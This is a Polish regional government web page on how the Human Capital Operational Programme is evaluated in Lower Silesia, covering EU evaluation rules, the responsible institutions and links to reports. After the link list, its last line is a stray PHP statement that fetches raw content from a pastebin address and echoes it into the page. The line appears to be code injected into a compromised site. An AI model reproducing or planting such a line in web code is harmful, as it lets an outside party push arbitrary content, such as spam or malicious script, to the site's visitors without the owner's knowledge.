Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Ewaluacja

Zgodnie z Wytycznymi nr 6 w zakresie ewaluacji programów operacyjnych na lata 2007-2013ewaluacja jest definiowana "jako osąd (ocena) wartości interwencji publicznej dokonany przy uwzględnieniu odpowiednich kryteriów (skuteczności, efektywności, użyteczności, trafności i trwałości) i standardów. Osąd dotyczy zwykle potrzeb, jakie muszą być zaspokojone w wyniku interwencji oraz osiągniętych efektów. Ewaluacja oparta jest na specjalnie w tym celu zebranych i zinterpretowanych informacjach za pomocą odpowiedniej metodologii". W badaniach ewaluacyjnych wykorzystywane są metody badań społeczno-ekonomicznych.

Ewaluacja według Rozporządzenia nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności  i uchylającego rozporządzenie (WE) nr 1260/1999 ma celu poprawę: jakości, skuteczności i spójności pomocy funduszy oraz strategii i realizacji programów operacyjnych w odniesieniu do konkretnych problemów strukturalnych dotykających dane państwa członkowskie i regiony, z jednoczesnym uwzględnieniem celu w postaci trwałego rozwoju i właściwego prawodawstwa wspólnotowego dotyczącego oddziaływania na środowisko oraz strategicznej oceny oddziaływania na środowisko".

Za ewaluację Programu Operacyjnego Kapitał Ludzki na poziomie całego programu odpowiada Instytucja Zarządzająca, czyli Departament Zarządzania Europejskim Funduszem Społecznym w Ministerstwie Rozwoju Regionalnego. W procesie ewaluacji uczestniczą również Instytucje Pośredniczące oraz instytucje wdrażające (Instytucje Pośredniczące II stopnia).

W województwie dolnośląskim za ewaluację komponentu regionalnego Programu Operacyjnego Kapitał Ludzki odpowiedzialna jest Instytucja Pośrednicząca, której funkcję pełni Departament Europejskiego Funduszu Społecznego w Urzędzie Marszałkowskim Województwa Dolnośląskiego. Instytucja Pośrednicząca delegowała niektóre zadania związane z realizacją ewaluacji na poziomie Działania instytucji wdrażającej (Instytucji Pośredniczącej II stopnia), której funkcję pełni Dolnośląski Wojewódzki Urząd Pracy w Wałbrzychu.

Raporty z badań ewaluacyjnych zawierają również rekomendacje dla instytucji odpowiedzialnych za wdrażanie programu, pozwalające rozwiązać problemy zdiagnozowane w czasie badań ewaluacyjnych. Instytucje Pośredniczące wykorzystują wspomniane rekomendacje podczas wdrażania PO KL w danym województwie, w tym również podczas opracowywanie rocznych Planów działania. Raporty ewaluacyjne dot. programów operacyjnych związanych z rozwojem zasobów ludzkich wraz z rekomendacjami znajdują się na stroniewww.funduszestrukturalne.gov.pl w zakładce Ewaluacja funduszy

Raporty z badań ewaluacyjnych zrealizowanych na zlecenie Instytucji Pośredniczącej dla komponentu regionalnego PO KL w województwie dolnośląskim dostępne są w zakładce Badania i raporty.

 

Linki:
Fundusze Europejskie - Ewaluacja: www.ewaluacja.gov.pl

Inne analizy i raporty: www.efs.dolnyslask.pl/

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");